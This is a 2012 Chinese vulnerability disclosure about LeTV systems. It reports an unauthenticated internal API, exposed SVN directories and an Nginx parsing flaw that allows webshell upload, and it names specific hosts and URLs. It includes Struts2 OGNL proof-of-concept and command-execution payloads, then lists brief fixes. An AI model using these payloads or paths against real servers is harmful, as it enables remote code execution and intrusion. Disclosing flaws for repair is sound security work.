1，内部查询接口无验证且匿名开放
 
http://123.126.33.234:8080/api/statistic/
 
 




 
2，二处内部系统SVN泄露
DNS管理系统
 
http://123.126.33.236/pages/.svn/entries
视频审核管理系统
 
http://vas.letv.com/.svn/entries
通过SVN遍历的时候发现tools下的大部分工具可直接操作，猜测应该可以向某文件发送post来删除视频
 
 
 
3，Struts2远程代码执行
 
http://bd.enp.letv.com/agents/list.action
 
 
 
 
http://web.iptv.letv.com/iptv2/view/content_search3DJson.action
 
 
 
 
http://app.iptv.letv.com/iptv2/view/searchPublicInfo.action同上
Poc www.2cto.com
 
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.sleep(999999999)')(\u0023rt\u003d@java.lang.Thread@currentThread()))=1
Exp
 
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('\u0023rt.exec(%22执行命令%22)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
4，Nginx解析漏洞
乐视TV（hdtv.letv.com）用的是开源ecshop改的，同时该站点下提供了一个供用户讨论的Discuz! X2论坛，这也是导致攻击者上传图片通过解析漏洞直接拿到webshell，从而达到各种目的，亲，Google site:hdtv.letv.com/bbs/ 搜索一下你就明白了，估计也是你们知道有问题了才限制了上传文件夹的权限，建议针对这个小问题升级一下和排查一下后门
 
 
 
 
http://hdtv.letv.com/bbs/robots.txt/.php
修复方案：1，内部系统还是添加一下验证吧
2，对svn目录限制访问或删除
3，及时升级线上的struts2
4，升级Nginx或参考 www.2cto.com/Article/201007/51735.html 2012-3-31
 

作者 Z-0ne